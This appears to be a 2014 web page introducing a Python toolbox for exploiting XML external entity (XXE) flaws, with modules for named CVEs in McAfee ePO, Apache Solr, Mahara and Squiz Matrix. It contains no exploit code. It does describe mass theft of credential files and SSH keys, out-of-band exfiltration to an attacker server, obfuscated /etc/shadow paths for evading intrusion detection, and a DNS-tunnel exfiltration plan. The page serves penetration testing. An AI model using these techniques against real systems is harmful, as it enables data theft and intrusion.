On The Outside, Reaching In

article by Ben Lincoln

This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The software described is a "preview release" which is not yet feature-complete and which is has not been tested on a variety of systems. Even if you are allowed to use the software, you should do so with caution, on systems which can be easily restored to their previous state if they are damaged.

Table of contents

Introduction — what is On The Outside, Reaching In?
XML (External) Entity Vulnerabilities
Practical and Useful XXE Exploitation
Current Modules
Known Limitations
Future Releases and Planned Features
If You Would Like To Contribute
Artwork and Historical Screenshots
Downloads

Introduction — what is On The Outside, Reaching In?

XXE Vulnerability Exploitation

Basic XXE attack (McAfee ePO)

Advanced XXE attack (Mahara)

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.
The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.
In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.
For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.

On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: provide a package of related exploits based around a common core which allows new exploits of similar types to be quickly developed because so much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.

This type of entity can be misused in several XML libraries to cause the target system to run out of memory — the specific techniques are frequently known as "Billion Laughs", and the "Quadratic Blowup". Both of these are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.

Where XML entites become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration^[2].

Practical And Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

Database credentials and/or connection strings.
SSH private keys.
TLS/SSL certificates and their private keys.
Lists of valid usernames
Configuration files
System information (from /proc)
Information about installed software and other components (which may reveal vulnerabilities)

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.

Because XML external entities are referenced in the form of URIs, then the potential is there to not only access content from the target server's filesystem, but to use that target server as a reverse HTTP proxy into the environment that is hosting it (as well as any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like http://127.0.0.1:8080/servlet/SnoopServlet, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt, when those URIs are accessed not by the attacker's system (which hopefully has no network level access to any of them), but by the exposed server with an XXE vulnerability, which is on the same (hypothetical) network that those sensitive internal URIs are pointing to.

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 (dependent on libxml2 version as well)
All modules involve pointing an RSS feed-reader object to a malicious RSS feed hosted using She Wore A Mirrored Mask, and exfiltrate data using a Yunusov-Osipov out-of-band technique^[2].
Valid Mahara credentials are required. In most cases, even standard user credentials should be sufficient (in other words, administrative credentials will work, but should not be required).
Mahara is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for this vulnerability.
In early June 2014, libxml2 was updated in a way that prevents this set of modules from working. For example, 2.7.8.dfsg-5.1ubuntu4.6 will allow these modules to function, but 2.7.8.dfsg-5.1ubuntu4.8 will not.
- CVE-2012-2239-ME - Modify the configuration of an RSS feed-reader on an existing page, then attempt to reset it to its original state once exploitation is complete. (1.4.3 and 1.5.2) [ Module created: 2014-03-22 ]
- CVE-2012-2239-PC-A - Create a new page (using administrative credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
- CVE-2012-2239-PC-U - Create a new page (using standard user credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
See OTORI - Example 3: Mahara for a detailed tutorial regarding these modules.
CVE-2013-6407 - Apache Solr (note: CVE-2013-6408 arguably also applies in some cases)
Three distinct vulnerabilities are exploited, giving pen-testers maximum flexibility if the system administrator has disabled access to some functionality.
Valid Solr credentials are not required.
Solr is a Java-based application, so only ASCII text can be retrieved. In addition, due to the specifics of the vulnerabilities, ASCII text which contains XML/HTML markup cannot be retrieved. There does not appear to be a practical limit on the size of files which can be obtained.
To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for these vulnerabilities.
- CVE-2013-6407-DARH - for Solr versions up to and including 4.3.0. Submits a crafted XML document for analysis (not storage), with the XXE-based content being immediately reflected back in the response from the server. This is the fastest Solr-related module, and works with the largest number of versions. This should be the preferred Solr-exploitation module unless the system administrator has disabled access to the Document Analysis Request Handler or it is paramount to avoid leaving error messages in the Solr log files. [ Module created: 2014-02-15 ]
- CVE-2013-6407-URH-DI - for Solr versions up to and including 4.0.0. Inserts a crafted document into the Solr index, queries Solr to retrieve the document content (which contains the XXE-based data), then attempts to delete that document. This is the slowest Solr-related module. It is the least likely to generate potentially-suspicious error messages in the Solr logs. [ Module created: 2014-02-15 ]
- CVE-2013-6407-URH-NMVF - for Solr versions up to and including 4.0.0. Attempts to insert a crafted document into the Solr index, but the document is designed to violate a constraint against a particular field containing multiple values. The insert will fail, and the XXE-based content is immediately reflected back in the server response. [ Module created: 2014-02-15 ]
See OTORI - Example 1: Apache Solr for a detailed tutorial regarding these modules.
CVE-2014-2205 - McAfee ePolicy Orchestrator from 4.6.0 to 4.6.7 (without Hotfix 940148) (note: only tested with version 4.6.4)
Valid ePO credentials are required, and the user account must have permission to import and view dashboards.
ePO is a (partly?) Java-based application, so generally only ASCII text can be retrieved. In addition, there are two quirks due to bugs/fully intentional, expected behaviour of ePO:
1. The maximum file size which can be retrieved is around 1KiB. Larger files will be truncated, and will contain a chunk of the dashboard definition appended to the actual content.
2. The first four characters of each file will be replaced with the fifth through eighth characters of the same file.
This vulnerability was disclosed by RedTeam Pentesting GmbH, and this module uses a method similar to the one in their example code.
- CVE-2014-2205-D - Uploads a crafted dashboard definition whose Description field contains the XXE exploit, views the dashboard, then attempts to delete it. [ Module created: 2014-05-26 ]
See OTORI - Example 4: McAfee ePO for a detailed tutorial regarding this module, including a walkthrough of how to obtain the ePO database credentials.
SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1 (note: only tested with version 4.6.3))
All modules involve making crafted requests (requests for an asset map, by default) to the Squiz instance. She Wore A Mirrored Mask is required for all three, because the vulnerability is triggered using a Yunusov-Osipov technique (entities nested via external XML fragment references)^[2].
Valid Squiz Matrix credentials are not required.
Squiz Matrix is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
This vulnerability was disclosed by Nadeem Salim from Sense of Security Labs, and this module uses a method similar to the one in Nadeem's example code.
- SOS-12-007-YU-404 - Makes a request referring to a non-existent page. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
- SOS-12-007-YU-IU - Makes a request involving an invalid URI. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
- SOS-12-007-YU-OOB - Makes a valid request, with the XXE-based content being exfiltrated using a Yunusov-Osipov out-of-band technique^[2]. This is the most reliable and most flexible of the Squiz Matrix modules. The other two are included mainly for tutorial purposes, although they may be able to retrieve slightly larger (a few bytes) files in some edge cases. [ Module created: 2014-03-16 ]
See OTORI - Example 2: Squiz Matrix for a detailed tutorial regarding these modules.
Generic XXE modules (for copy/pasting requests from an intercepting proxy)
- G-XXE-Basic — basic request with XXE content in the body of the response [ Module created: 2014-07-20 ]
- G-XXE-YO — Yunusov-Osipov-style out-of-band [ Module created: 2014-07-20 ]
See OTORI - Example 7: Generic XXE Modules for a detailed tutorial regarding these modules.

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

Ten working exploits for one commercial product (McAfee ePO 4.6.0 - 4.6.7) and three open-source software packages (Apache Solr, Squiz Matrix, and Mahara) are included. Eventually this number should be far higher.
No exploits for systems using Microsoft's XML libraries (SharePoint, etc.) are included (yet). SharePoint itself included a gaping XXE vulnerability up until 2011 (see MS11-074 for details). However, while it's so easy to exploit by hand that even a child could almost do it, trying to automate the process using raw HTTP requests reveals yet another case where beneath its simple-to-use surface, SharePoint is a daunting maze of unexpected complexity.
Built-in support for the use of an explicit HTTP proxy is not included. However, you can use tools like proxychains to connect through a proxy. I recommend proxychains-ng / proxychains4, which I have tested successfully for this purpose (specifically, version 4.7).
Built-in support for HTTP authentication is not included. If you need to connect to a system configured for HTTP authentication, you can use proxychains-ng / proxychains4 to connect through Burp Suite, and configure Burp Suite to handle platform authentication.
While most of the requests sent across the network are designed to be randomized and therefore more difficult for IDS/IPS devices to detect, some of the content (especially more-recently-developed content) is somewhat predictable - in particular, the RSS feed used by the Mahara modules.
It has been tested only on Linux (specifically, Debian 7 x64 and Kali Linux 1.0 x64).
It has been tested only using Python 2.7.3 (the current default on both test platforms). I briefly tried using it under Python 2.6.5 (the "current" version on my BackTrack 5 VM), and it failed to run due to some of the string-formatting code.
It pretends it is capable of HTTP 1.1 requests, but does not support connection re-use.
This software has not been tested with IPv6.

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

Java-based systems typically allow directories to be enumerated, and the included Apache Solr module allows this to be exploited. Although the filesize for content retrieved via this module is effectively unlimited, only text files with no XML markup can be retrieved due to the XML schema which Solr uses.
PHP-based vulnerable systems typically allow binary content to be retrieved (because PHP includes a handy (for attackers) function that base64-encodes such data), but the maximum file size is typically about 4K unless it was built with customized compiler flags.

See the documentation for individual modules for more details.

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

Completely replace the use of httplib with the pen-testing-friendly equivalent discussed above.
Automatically launch a basic SWAMM instance to streamline the most common use of that tool.
URI-specific basic IDS/IPS signature evasion. For example, if the current URI to be requested is file:///etc/shadow, then randomly transform it into something like file:///etc/default/../shadow, file:///var/tmp/../log/../etc/default/../shadow, or file:///var/tmp/%2e%2e/log/%2e.%2fetc/default%2f2e./%73%68%61%64%6f%77.
The optional ability to specify module options using name/value pairs instead of the current position-based system.
Variable support for URI lists (e.g. a list is provided of the content of a typical Apache Tomcat directory structure, it begins with file:///%BASEPATH%/, and at runtime the value for that value is specified so the user doesn't have to generate their own list file every time).
Filtered view of modules based on search or other criteria (e.g. what functionality the module supports).
Separate groupings of modules for mainline, community-contributed, and user-developed (to avoid stomping on users' files when they upgrade).
An option to profile the target (attempt to determine the OS, system specs, etc.).
Correct HTTP 1.1 operation (pipelining, etc.).
Native proxy support.
Authentication (NTLM, Kerberos, etc.) for both webservers and proxies.
Fix the --noemptydirs option so that it works as expected in --exacturilist mode.

It would be tough to integrate into this particular tool (it would require the DNS equivalent of She Wore A Mirrored Mask, for one thing), but I like the idea of doing a combined XXE + DNS-tunneling data exfiltration. E.g. the system that has the data does not have internet access of any kind, but it can make calls to a vulnerable Solr server which is allowed to perform DNS lookups against a DNS server which is configured in the standard way (IE it can make requests to DNS servers on the internet). The data is chunked and encoded as a series of base32 values of length 63 characters or less, which have a domain name belonging to the attacker appended (e.g. kle14l5a14a14355al55312qpbgah1355hgal55al515la5351la31bgl145a34.sll2454a52423524qbnau34labiweaalbuayk51i545bh14k3hb51w43kba145b.chunk000047.dnstunnel.reallycleverplan.com, etc.). Solr is made to attempt to load content from each of those domains (by using --exacturilist mode with a series of URIs like http://kle84l5a84a84375al75382qpbgah8357hgal57al785la7358la68bgl847a64.sll9474a79496794qbnau64labiweaalbuayk78i547bh84k6hb78w46kba847b.chunk000047.dnstunnel.reallycleverplan.com/do_not_care_if_this_exists_or_not.html, etc.). It doesn't have to succeed at loading the content (although getting an HTTP response of some kind instead of a timeout will make it run much faster), but just by performing the DNS lookup, it will cause the encoded data to be sent to the authoritative DNS server for the domain in question (which would be running the aforementioned DNS equivalent of She Wore A Mirrored Mask). The encoded data can then be re-assembled into the original file.

If You Would Like To Contribute

Please get in touch with me using the Contact form.

Artwork and Historical Screenshots

Screenshot of the highest-resolution banner

First successful out-of-band binary file download

Higher-resolution version of the icon/banner artwork (ANSI art version)

Higher-resolution version of the icon/banner artwork

Downloads

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	4 MiB	0.3	2014-07-20	Ben Lincoln

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	4 MiB	0.2.1	2014-06-22	Ben Lincoln
Includes several lists for scraping /proc on Linux target systems.

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	343 KiB	0.2	2014-06-15	Ben Lincoln

Footnotes

1.	Some of the diagrams on this page contain OpenOffice/LibreOffice Draw shapes created by Frank Ebert.
2.	See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov.